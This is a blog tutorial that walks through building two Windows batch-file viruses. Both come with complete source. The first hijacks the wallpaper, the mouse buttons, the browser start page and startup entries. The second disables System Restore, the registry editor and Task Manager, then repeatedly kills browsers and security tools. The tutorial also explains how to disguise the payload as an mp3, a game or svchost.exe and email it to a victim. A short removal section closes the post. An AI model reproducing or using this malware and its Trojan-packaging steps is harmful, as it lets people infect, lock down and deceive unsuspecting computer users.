MAKE YOUR OWN VIRUS BY MAKING YOU OWN BATCH FILE

MAKE YOUR OWN VIRUS BY MAKING YOU OWN BATCH FILE

It’s always been this way that we fellows be the good guys and save the day fighting malware threats… But as they say, you need to think like a criminal to catch one! And so we do the same, to understand how a malware works, how does it gains access, gains control, we will our self make a batch file based virus. A little knowledge of programming, just to extent how we do it, and knowledge of windows registry is a prerequisite.

Batch files, characterised by their .bat extension, are files containing a sequence of DOS commands that gets executed when the batch file is run. This allows you to make simple programs that perform simple tasks under limitations of DOS shell. Though higher level languages like BASIC, PASCAL and C interacts with system on lower level, batch file processing is a good start to understand malware.

The kind of malware that we are going to learn to make is one that will perform a simple task of changing desktop wallpaper, interchanging the left and right mouse keys, changing start page of internet explorer(6), and make a start-up entry so that it starts every time system starts. Though this sounds like a simple task, automation of this procedure such that it works on a single wrong click by user and runs all tasks without any confirmation and hidden is a tough job when started from scratch.

The components of the virus will be a main executable file, under cover of some attractive icon, which on execution extracts in background to a batch file and the wallpaper, then runs the batch file.

Before code, let’s learn a few basics, first on creation on batch files. These aren’t any special files created by some special applications. They are simple notepad files, where in code is written and then its extension changed to .bat. They run simple tasks like MOVE, COPY, RENAME etc , a few moderate tasks like changing file attributes ( i.e. making a file hidden, giving system attribute or removing the attributes) and a few complex tasks like altering a system registry without user intermission. The main draw back in a batch file is that it doesn’t remain active in memory (though we can make it by some loop), it just performs the stated tasks and shuts down. Hence, it can act as a trigger, and not the process itself.

Now, let’s learn a few commands of batch files. Though a basic knowledge of DOS is crucial, if not, you can still follow what’s going on. Starting with a simple rename command, the syntax is-

RENAME [Drive]: [path] filename1 filename2

Example:             RENAME C:\documents and settings\aijaz.txt gyaan.dat

Hence we see we can change the extension of file as well. If the path and drive of file aren’t specified, it is assumed that the file is in the current directory where from CMD is running.

Example:             RENAME aijaz.txt gyaan.dat

This command searches a file name aijaz.txt in current directory and renames it to gyaan.dat.

Coming to MOVE command, it moves the file from one path to another. It is like cut and paste. The syntax is-

MOVE [/Y |/-Y] [drive] [path] filename destination

The /Y attribute assigned allows CMD to overwrite files without confirmation, hence maintaining cover from user.

Example: MOVE /Y C:\aijaz.txt D:\

This moves the file aijaz.txt to drive D: . While moving a file, if source path isn’t mentioned, then it is assumed that the file is in current directory. But destination path is mandatory.

We use the move command to change the wallpaper. The wall paper once set, is converted to a bitmap image and is then moved to the directory–

C:\Documents and settings\”user name”\local settings\application data\Microsoft

But the windows directory may be different drive like D:, E: and even the user name isn’t known. This makes it not suitable to mention a specific path in our code. We use system parameters to identify windows drive and user profile directory. The command– %userprofile% returns the path of the location highlighted in above command. To give path in CMD using system parameters, we need to write path in quotation marks. The command to change wallpaper becomes-

MOVE /y Wallpaper1.bmp “%USERPROFILE%\Local Settings\Application Data\Microsoft”

This copies the wallpaper from current directory to the location where wallpaper is stored.

Note: It is to be kept in mind that windows actually use only uncompressed bitmap images as wallpapers. Whenever we set an image as wallpaper, it is converted to bitmap and then stored at above mentioned location in user profile with name wallpaper1, hence the reason. Thus, the wallpaper we use here should already be a bitmap image, use an image editing tool like Irfanview which does a good job at conversion to bitmap.

Once the wallpaper has been replaced, the system needs to be updated for change to take place on desktop. This is done using the command-

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

After the execution of batch file, it is desired that it isn’t available to host PC that he may open it and view the code, which discloses the location of our batch virus and also the registry key we have added. This is done by simply deleting the files.

Del /F /Q /A:SHR filename

/F forces deletion of read only files, /Q suppresses the confirmation to delete, /A deletes files based on given attributes. S- System, H- Hidden, R- Read only.

Now coming to editing registry, there are two methods of editing a key, first by making a .REG file using batch print tool to write registry keys in a file and later appending them to registry. But this method adds a couple of more lines to our code. Hence we prefer the second method of editing registry directly via command line using REG command.

The syntax to add a key to registry is-

REG ADD main key/v Sub key /t data type /d value /f

The /f parameters enables editing a key without confirmation from user. Our intention is to add a start-up entry in registry such that our code gets executed every time windows logs on. Hence the wallpaper is changed again, making the innocent user panic! The actual key we use is-

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f

The above command writes a start-up key which makes the file pointed by the key run every time windows start. We use %windir% parameter to make sure that no error is encountered in case OS is installed on some other drive.

The point to be noticed here is that the same technique is used by malware to make sure they remain active in memory. The first thing to be done having ended a malicious code execution is to terminate its start-up mechanism. Refer the postEradicate malware.

Similarly to change the start page of internet explorer (tested on IE 6), the registry key is-

REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d http://pcgyaan.wordpress.com /f

Since IE 6 stores the default start page in registry key, it is very vulnerable to this simple attack. I am still working on changing start page of Mozilla Firefox.

Now to add a little more insult to injury, how about tying down our victim’s right arm and make him struggle with his left? We gonna switch the right and left keys of our mouse, making our victim panic even more! Here is the command….

RUNDLL32.exe USER32.DLL,SwapMouseButton

Having learned a few tricks of trade, let’s put down the final batch file code. Open a notepad file and key down this script….

@ECHO OFF

REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d http://pcgyaan.wordpress.com /f

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f

copy /y Wallpaper1.bmp  ”%USERPROFILE%\Local Settings\Application Data\Microsoft”

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

RUNDLL32.exe USER32.DLL,SwapMouseButton

rename song.exe  force.exe

move /y force.exe “%windir%”

del /Q force.bat

del /Q wallpaper.bmp

Save the file and change its extension to .bat. This is the core virus file. Now pick up a photo of our victim and edit it so that it will annoy him the most! This can be simply be done by opening the file in note pad and making it funny or if you how to, edit it in Photoshop. Or sites like photo funaic can be used to spoil the photo. Usually these photos are JPEG format. As mentioned earlier, we need a bitmap image. Convert it to bitmap using an image editing tool, preferably Irfanview since it preserves the quality of photo. Rename this photo to wallpaper1.

It’s quite obvious that nobody will click a suspicious looking batch file, thanks to my previous posts! The second task is to pack our batch file and wallpaper into a single file and change its icon, to mask it, so that user will be compelled to open it. The file can be made to look like a folder, or an mp3 file or a word file or anything. What you need is WinRAR and another software called IconFX.

Install IconFX and run it. In file menu, go to extract icons. Browse for shell32.dll file located in windows\system32 directory and extract and save icon of folder. You can also use the snap tool of iconFX and take snap of files to make an .ico icon file. Here we will name our packed file as song and select icon as an mp3 file icon. Just take snap of mp3 file, preferably windows media player icon. Save the icon at some location.

1. Install WinRAR on your PC. Select the two files, batch file and bitmap wallpaper by holding Ctrl key, right click and select add to archive option.
2. In the opened window, click Create SFX archive.
3. Go to Advanced tab and SFX options in it. In path to extract, select create in current folder. In setup program section, in Run after extract, add name asforce.bat.
4. In Modes tab, under silent mode section, select hide all.
5. In update tab, in overwrite section, select overwrite all files.
6. In text and icon tab, under Customize SFX logo and icon, in Load SFX icon from file, browse and set icon as MP3 icon. Click OK and compress the files. You will get a single .exe file which has an icon of mp3 file. Let’s rename this file as song.

Note: The names force.bat and song.exe must not be changed, since they are referred by those names in batch code.

Now we have a file with name song, having an mp3 icon, quite innocent looking but having really naughty intensions! But the problem here is that if we mail it as it is, either clients like Yahoo doesn’t allow attaching .exe files, also when victim downloads the file, its extension is also shown, exposing our plot. Hence, in case of mailing this virus, compress it to a simple .RAR file and mail it. The victim will extract it, and then see a file with name song and icon of mp3. In curiosity, he will open it and our job is done!!

malware have evolved too. There are new tricks up its sleeves and other surprises that will make you look ahead to the most miserable option – to reinstall your windows. With the sole motive to learn a few more strategies that malware employ to put us into trouble, we make our own malware and see it work. This will develop in us a lot of understanding how malware cause trouble, even preventing antivirus programs to remove them. This will eventually make us skilled enough to catch loop holes in malware that can be exploited to get rid of it, and we do the same at the end of the post. Now, leaving behind our good intensions, let’s put on our masks and enter the darklab!

learning a few DOS and batch basics, which did a little mischief. Well, this time we gonna turn a little more mischievous! The issue with our virus was that it ran a few tasks and later terminated, but this time, we gonna make it run continuously in a cycle, causing little close to what can be called havoc!

This time we will make a virus that will alter registry to start at startup and also place restrictions that will make removing it tough. Like many other malware do- disable system restore, disable registry editing, disable task manager, disable run, and disable folder options as well. In short, a tough one to catch hold of manually! And the virus will remain active in memory, running a process that will monitor your activity and prevent you from running any browser or IM client.

Since we have had discussed how we move around in DOS environment, we will directly speak of motives and how we accomplish them. Our main virus will as usual be a single executable. This file will be a decoy, tempting our victim to open it, posing as a crack or a game. Upon successful execution, this will launch out first batch file that will plant the main virus, another executable file at a secure location and then execute it. Hence, we see how a seemingly legitimate program causes you harm; this is what is called a Trojan horse planter. This launcher can be made to run a legitimate application at the end too, making us less suspicious of what we did in background.

As soon as the virus is planted, it is executed and the second batch file is run, that makes startup entries, apply restrictions and then as planned, runs a loop that will continuously trouble you. The point to be noted here is that the loop can either just carry out the aimed task, which is closing all internet applications in our case, or will carry out the aim and continuously refresh restrictions. In the latter case, unless the malicious process in memory is stopped, registry defaults tools fail to help you; and this is what is happening in newer viruses. It is also important to be mentioned that the registry key responsible for opening the exe files is also being edited by most viruses nowadays, making us helpless since we cant run or install our dependable antivirus. We don’t include this feature in our virus since it crosses the fine line between a prank and a dirty crime.

Thus, you can’t view the virus file, that will be super hidden, nor will you be able to restore registry defaults, which is relaxed in this case fearing avoiding the worst in case you execute the virus yourself…!

Having learned what we are going to do, we head towards code part. Open up a notepad file and key down this code, this will serve as our main batch file.

force.bat code:

@ECHO OFF

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\system32\config\svchost.exe /f

reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

:loop

taskkill /F /IM taskmgr.exe /IM procexp.exe /IM firefox.exe /IM chrome.exe /IM iexplore.exe /IM yahoomessenger.exe /IM autoruns.exe

goto loop

After entering the code, go to save as, save this file as force.bat , while keeping save as type as All files. Now, download Bat to exe converter and convert this batch file to an exe file, while keeping options as instructed below:

1. Set visibility as invisible application.
2. Set working directory as Temporary directory.
3. Set temporary files to delete at exit.

In the version information tab, choose an icon file of a DLL and compile the batch file. You will get an exe file that will have icon of a DLL file. Rename this file tosvchost.exe, this name and icon will serve as our decoy. Than change the attributes of this file to hidden,

Now, the virus is ready, we need a planter that will launch the virus on your PC.  For this we code this launch batch file as follows.

Launch.bat code:

@echo off

move /y svchost.exe “%windir%\system32\config\”

start %windir%\system32\config\svchost.exe

start game.exe

exit

Notice that you will need an application that will run after you run the planter, to avoid suspicion. This is a small flash game named “game.exe” in our case. And we choose icon for our launcher as a game icon. If you want it other way, you can choose an mp3 icon, and change the code as –

start song.mp3

And include into launcher a song that will be played once the launcher is executed.

After the file have been coded, name it as launch.bat . Now, we get a small flash game & an icon for it and run bat to exe converter. Choose options as we did in previous case and set the icon file as well. But this time, go to include tab and select add option and add the previously made svchost.exe file and the flash game, renamed to game.exe. Now compile this and of virus is ready.

It is an innocent looking application, claiming to be a flash game, having icon of a game, which is really tempting to try a hand on. Once executed, the contents- The launch.bat, svchost.exe and game.exe are extracted in temp folder and launch.bat is run. As programmed, the launch.bat file will move the main virus svchost.exe to config folder in system32 directory and run it. At the same time, it will run the game that is extracted in temporary folder. This way, the victim sees a game start and doesn’t suspect our Trojan planter. Now our planter has done its job and the main virus is into its place and has been run.

The main virus named as svchost.exe, even if seen through some process monitor tool, looks like a windows application, with icon of a DLL. This virus will anyways disable task manager, so that it can’t be end tasked. It also disables folder options, which prevents victim to search for it since it is super hidden. It also disables run, so that user cant launch applications like group policy editor. It disables registry editing; hence any attempt to import registry will be rejected. And then it goes into a continuous loop that will close Internet explorer, Chrome, Firefox and Yahoo messenger. You can also include other unwanted applications into this list, like process explorer, autoruns tool, malwarebytes etc. Hence, it’s a complete havoc!

Now coming to removing such nasty viruses, it goes by trial and error at first. You try system restore, its disabled, no restore points are available; you try opening task manager, it’s disabled. You try restoring registry defaults, its disabled too. Also process explorer and autoruns fail to start too.

Firstly, since the tools like Process explorer and autoruns can’t be disabled through registry (unless EXE file association is edited, which wont allow you to run any exe file), you will rename them and then run them. Since the virus was monitoring image name and end tasking it, it can’t stop the altered image name. Now, in process explorer, we analyze each of the processes. We notice a suspicious extra svachost.exe, which is running from system32\config folder, which blows its cover. We end task it and delete it. Now running autoruns, we remove its startup registry key as well. Now, the malware is gone, just the alterations in registry remains. Hence, you try cmd. Go to system32 folder and run cmd from there. In cmd, you edit the key which disables registry editing.

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

This lets you edit registry now. Import the defaults.reg entries and this must fix the rest of the issues. Note that system restore will have to be manually enabled from group policy editor GPEDIT.MSC.

Hence we see that even smarter viruses have loop holes that can be exploited and used to get rid of them.

Note: Booting into safe mode is a favorite option for many, since startup isn’t loaded. But viruses now alter the USERINIT registry key and attach itself to it, hence starting in safe mode too, making the attempt fruitless.